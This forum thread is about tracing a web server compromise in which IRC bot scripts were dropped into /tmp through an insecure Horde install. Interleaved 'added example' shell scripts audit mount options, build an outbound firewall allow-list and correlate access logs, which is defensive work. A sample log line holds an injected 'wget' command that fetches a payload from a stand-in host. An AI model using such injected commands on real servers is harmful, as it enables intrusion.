Full Version: Locating security hole
OllieMaitland
Hey -

I have a fairly busy webserver, with a secured /tmp directory:

CODE
/usr/tmpDSK /tmp ext3 loop,rw,noexec,nosuid,nodev 0 0

/tmp /var/tmp ext3 rw,noexec,nosuid,nodev,bind 0 0


However, once in a while (becoming more frequent) a script seems to get itself running and typically connects to an ircd and runs some inane command which uses up the CPU.

After I find this I always run the rootkit scans and ls -la the /tmp directories. I often find a directory with some scripts in it, so I delete them and then grep through domlogs looking for one of the following:

wget, LWP or Simple (and not 404)

Now, wget is pretty secure:

CODE
-r-x------    1 root     wheel      205876 Oct 20  2005 /usr/bin/wget*


But today a command was running, from perl:

CODE
sh -i


This was connected to ircd, but I can't find anything on the server that indicates how the script was running. I updated phpBB, which was running 2.0.18, and will see if that stops the problem, but does anyone have any tips on trying to stop this sort of breach occurring?

Should I be more worried other than the annoyance of these scripts if my /tmp dir is secured?

Is it possible to firewall off ircd outbound connections?

Any ideas would be gratefully received!
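The mount options quoted above are the right ones, but two things are worth checking before trusting them. First, noexec only stops direct execution of a file: "perl /tmp/x.pl" or "sh /tmp/x.sh" still runs, which is exactly the "sh -i" from perl seen later in the thread. Second, on the util-linux of that era the options listed on a "bind" line in fstab are not applied to the bind mount until a separate "mount -o remount,noexec,nosuid,nodev /var/tmp" is done (mount(8) documents this), so the live output of "mount" can disagree with fstab. The following audit script is an added example, not something from the thread; the fstab and "mount" output it checks are constructed samples (the fstab lines copied from the post, the mount lines invented to show the bind-mount gap), and the temp files and function names are mine.

```shell
#!/bin/sh
# Added example: audit fstab entries and live `mount` output for the
# hardening options the original poster uses on /tmp and /var/tmp.
# Constructed sample data is embedded below; pass real files instead.

REQUIRED="noexec nosuid nodev"

# missing_opts OPTS  -> space-separated list of REQUIRED options absent
# from the comma-separated option string OPTS (empty if none missing)
missing_opts() {
    missing=""
    for want in $REQUIRED; do
        case ",$1," in
            *",$want,"*) ;;
            *) missing="${missing}${missing:+ }$want" ;;
        esac
    done
    echo "$missing"
}

# report MOUNTPOINT OPTS -> one verdict line; returns 1 if hardening is missing
report() {
    if [ -z "$2" ]; then
        echo "$1: not listed"; return 1
    fi
    m=$(missing_opts "$2")
    if [ -n "$m" ]; then
        echo "$1 missing: $m"; return 1
    fi
    echo "$1 ok ($2)"
}

# audit_fstab FSTAB_FILE MOUNTPOINT...  (field 2 = mount point, field 4 = options)
audit_fstab() {
    f=$1; shift; rc=0
    for mp in "$@"; do
        opts=$(awk -v mp="$mp" '$1 !~ /^#/ && NF >= 4 && $2 == mp { print $4; exit }' "$f")
        report "$mp" "$opts" || rc=1
    done
    return $rc
}

# audit_mounts MOUNT_OUTPUT_FILE MOUNTPOINT...
# Same check against `mount` output, whose lines look like
#   /usr/tmpDSK on /tmp type ext3 (rw,noexec,nosuid,nodev,loop=/dev/loop0)
# i.e. field 3 is the mount point and field 6 the parenthesised options.
audit_mounts() {
    f=$1; shift; rc=0
    for mp in "$@"; do
        opts=$(awk -v mp="$mp" '$2 == "on" && $3 == mp { gsub(/[()]/, "", $6); print $6; exit }' "$f")
        report "$mp" "$opts" || rc=1
    done
    return $rc
}

# --- constructed samples (fstab lines from the post; mount lines invented) ---
FSTAB_SAMPLE=$(mktemp); MOUNT_SAMPLE=$(mktemp)
trap 'rm -f "$FSTAB_SAMPLE" "$MOUNT_SAMPLE"' EXIT
cat > "$FSTAB_SAMPLE" <<'EOF'
/usr/tmpDSK /tmp ext3 loop,rw,noexec,nosuid,nodev 0 0
/tmp /var/tmp ext3 rw,noexec,nosuid,nodev,bind 0 0
/dev/sda1 /home ext3 defaults 0 0
EOF
cat > "$MOUNT_SAMPLE" <<'EOF'
/dev/sda1 on / type ext3 (rw)
/usr/tmpDSK on /tmp type ext3 (rw,noexec,nosuid,nodev,loop=/dev/loop0)
/tmp on /var/tmp type none (rw,bind)
EOF

echo "== fstab =="
audit_fstab "$FSTAB_SAMPLE" /tmp /var/tmp /home || echo "fstab: hardening gaps found"
echo "== live mounts =="
# /var/tmp passes in fstab but fails here: the bind mount never got its options
audit_mounts "$MOUNT_SAMPLE" /tmp /var/tmp || echo "mount: remount needed"
```

On a real box run it as "audit_fstab /etc/fstab /tmp /var/tmp" and "mount > /tmp/m.txt; audit_mounts /tmp/m.txt /tmp /var/tmp"; the second check is the one that matters, since the kernel enforces what "mount" reports, not what fstab says.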
OllieMaitland
The answer was an insecure version of Horde, and curl incidentally.
xenneo
Glad to hear you got that sorted out. I noticed you stated that it was running an IRCD or a port that uses IRC; this is pretty broad, but a lot of times I found that people use the same scripts and don't rename stuff.

Run this:
updatedb; locate iroffer

A lot of times people that do this use Iroffer; it's pretty simple to use from what I've seen. Examine the conf file they uploaded to see where else they may have tried or have uploaded stuff to your box.

A firewall like APF that's filtering outbound traffic would definitely slow this down. Only allow outbound the ports you need.

Also note, a lot of people use "curl" or "lynx" to get stuff on your box; wget isn't the only one, which I'm sure you know. Hope this helps.
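To make "only allow outbound the ports you need" concrete, and to answer the earlier question about firewalling off outbound ircd connections: the script below generates an iptables-restore ruleset whose OUTPUT chain drops by default, lets established connections (the web server's replies) through, and allows new connections only to the listed TCP ports, logging everything else so a bot dialling out to an ircd shows up in syslog. This is an added example, not APF configuration or anything from the thread; the function name and the choice of ports are mine, and the ruleset is only generated, not applied (apply it with "iptables-restore" after checking it against what the box actually needs, e.g. SMTP, NTP, DNS over TCP, package mirrors).

```shell
#!/bin/sh
# Added example: generate an outbound allow-list ruleset in iptables-restore
# format. Only the OUTPUT chain is touched; INPUT/FORWARD keep their policy.
# Uses the `state` match, which is what 2.6-era kernels of the thread's time had.

# outbound_rules PORT...  -> ruleset text allowing new outbound TCP connections
# only to the given destination ports (plus UDP 53 for DNS and loopback)
outbound_rules() {
    echo '*filter'
    echo ':INPUT ACCEPT [0:0]'
    echo ':FORWARD ACCEPT [0:0]'
    echo ':OUTPUT DROP [0:0]'
    echo '-A OUTPUT -o lo -j ACCEPT'
    # replies to inbound HTTP/SSH etc. belong to established connections
    echo '-A OUTPUT -m state --state ESTABLISHED,RELATED -j ACCEPT'
    echo '-A OUTPUT -p udp --dport 53 -j ACCEPT'
    for p in "$@"; do
        echo "-A OUTPUT -p tcp --dport $p -m state --state NEW -j ACCEPT"
    done
    # anything else (6667, 6697, random high ports a bot's ircd listens on)
    # is logged, rate-limited, and then dropped by the chain policy
    echo '-A OUTPUT -m limit --limit 5/min -j LOG --log-prefix "OUTBOUND DROP: "'
    echo 'COMMIT'
}

# allows_port RULESET PORT -> 0 if the ruleset contains an ACCEPT for TCP PORT
allows_port() {
    printf '%s\n' "$1" | grep -q -- "-p tcp --dport $2 -m state --state NEW -j ACCEPT"
}

# Typical web host: HTTP/HTTPS for updates, SMTP out, DNS via UDP above.
RULES=$(outbound_rules 80 443 25)
printf '%s\n' "$RULES"
# To apply:  printf '%s\n' "$RULES" | iptables-restore
# To watch:  grep 'OUTBOUND DROP' /var/log/messages
```

The first thing that lands in the log after applying this is usually the bot itself, complete with the destination address of the ircd, which is more useful for the clean-up than the process name.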
OllieMaitland
The script I found was temp2006

http://www3.ca.com/securityadvisor/virusin...s.aspx?id=47980

but it appears to be able to be deployed, at least partially, in Horde < 3.1.1 - you might notice the bright banner on their homepage (which has only just turned reddish!)

http://cvs.horde.org/horde/services/help/index.php

I think that looks like where my problems were coming from. eval()!
Bork
Any other tips for finding the culprit? So far he hasn't been able to run his application, but somehow he's managing to upload stuff onto my /tmp folder. I know which user he's uploading as (I have suexec and phpsuexec running), but checking domlogs, access_log and error_log hasn't given me a clue yet (I checked the timestamp of the file he last uploaded).
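Grepping the domlogs for wget/LWP and checking the dropped file's timestamp, as done earlier in the thread and again in the post above, are the right two clues; what makes them useful together is converting the log's timestamps to epoch seconds and looking only at the requests within a short window of the file's mtime. The script below does that in portable sh and awk (no gawk mktime), skips 404s as the original grep did, and tags each request in the window: TOOL when a downloader name appears in the request line or User-Agent (extending wget/LWP with curl, lynx and libwww-perl, the name LWP announces itself under), POST for a successful POST (an upload into /tmp through a PHP hole usually looks like this and carries no telltale string in the log at all), NEAR for anything else. It is an added example, not code from the thread; the access log lines are constructed, the Horde path in them is only the one the thread links, and the function names are mine.

```shell
#!/bin/sh
# Added example: correlate a dropped file's mtime with an Apache
# combined-format access log and flag the requests that could explain it.

# downloader names to look for (lower-cased; the log text is lower-cased too)
TOOL_RE='wget|curl|lynx|lwp|libwww|fetch'

# awk helpers: Apache timestamp "10/Oct/2006:13:55:36 +0000" -> epoch seconds
AWK_TIME='
function days_from_civil(y, m, d,    era, yoe, doy, doe) {
    if (m <= 2) y--
    era = int((y >= 0 ? y : y - 399) / 400)
    yoe = y - era * 400
    doy = int((153 * (m + (m > 2 ? -3 : 9)) + 2) / 5) + d - 1
    doe = yoe * 365 + int(yoe / 4) - int(yoe / 100) + doy
    return era * 146097 + doe - 719468
}
function epoch(ts,    a, dmy, mon, tz, sign, off) {
    split(ts, a, " ")                 # a[1] = date:time, a[2] = zone
    split(a[1], dmy, "[/:]")          # d, Mon, y, h, m, s
    mon = (index("JanFebMarAprMayJunJulAugSepOctNovDec", dmy[2]) + 2) / 3
    tz = a[2]; sign = (substr(tz, 1, 1) == "-") ? -1 : 1
    off = sign * (substr(tz, 2, 2) * 3600 + substr(tz, 4, 2) * 60)
    return days_from_civil(dmy[3], mon, dmy[1]) * 86400 \
           + dmy[4] * 3600 + dmy[5] * 60 + dmy[6] - off
}
'

# per-line scan: keep requests within +/- win seconds of t0, drop 404s, tag
AWK_SCAN='
{
    if (!match($0, /\[[^]]+\]/)) next                 # no [timestamp]
    t = epoch(substr($0, RSTART + 1, RLENGTH - 2))
    if (t < t0 - win || t > t0 + win) next
    split($0, q, "\"")                                # q[2] request, q[6] User-Agent
    split(q[3], sb, " ")                              # sb[1] status, sb[2] bytes
    if (sb[1] == "404") next                          # a 404 fetched nothing
    tag = "NEAR"
    if (match(tolower(q[2] " " q[6]), tool_re)) tag = "TOOL"
    else if (q[2] ~ /^POST /) tag = "POST"
    printf "%-4s %+d %s %s \"%s\"\n", tag, t - t0, sb[1], q[2], q[6]
}
'

# epoch_of_apache_time "10/Oct/2006:13:55:36 +0000" -> seconds since 1970
epoch_of_apache_time() {
    printf '%s\n' "$1" | awk "$AWK_TIME"'{ print epoch($0) }'
}

# suspects LOGFILE MTIME_EPOCH WINDOW_SECS -> tagged requests near the mtime
suspects() {
    awk -v t0="$2" -v win="$3" -v tool_re="$TOOL_RE" "$AWK_TIME$AWK_SCAN" "$1"
}

# --- constructed sample log (not real traffic) ---
SAMPLE_LOG=$(mktemp); trap 'rm -f "$SAMPLE_LOG"' EXIT
cat > "$SAMPLE_LOG" <<'EOF'
10.0.0.5 - - [10/Oct/2006:13:40:02 +0000] "GET /index.php HTTP/1.1" 200 5123 "-" "Mozilla/4.0"
192.0.2.77 - - [10/Oct/2006:13:55:10 +0000] "GET /horde/services/help/index.php HTTP/1.1" 200 1834 "-" "libwww-perl/5.805"
192.0.2.77 - - [10/Oct/2006:13:55:21 +0000] "POST /horde/services/help/index.php HTTP/1.1" 200 412 "-" "Mozilla/5.0"
192.0.2.77 - - [10/Oct/2006:13:55:24 +0000] "GET /index.php?cmd=wget%20http://192.0.2.9/t.tgz HTTP/1.1" 404 295 "-" "Mozilla/5.0"
10.0.0.8 - - [10/Oct/2006:13:55:30 +0000] "GET /style.css HTTP/1.1" 200 980 "http://www.example.org/" "Mozilla/4.0"
192.0.2.77 - - [10/Oct/2006:13:55:33 +0000] "GET /images/a.gif?x=curl HTTP/1.1" 200 4410 "-" "Mozilla/5.0"
10.0.0.5 - - [10/Oct/2006:14:30:00 +0000] "GET /index.php HTTP/1.1" 200 5123 "-" "Mozilla/4.0"
EOF

# On a real box take the mtime from the dropped file: MTIME=$(stat -c %Y /tmp/.x/t.tgz)
MTIME=$(epoch_of_apache_time '10/Oct/2006:13:55:36 +0000')
suspects "$SAMPLE_LOG" "$MTIME" 60
```

Run it against each domlog in turn with a window of a minute or two; the client address that shows up as both TOOL and POST within seconds of the mtime is normally the one, and its earlier requests in the same log show which script it was poking at before the upload succeeded.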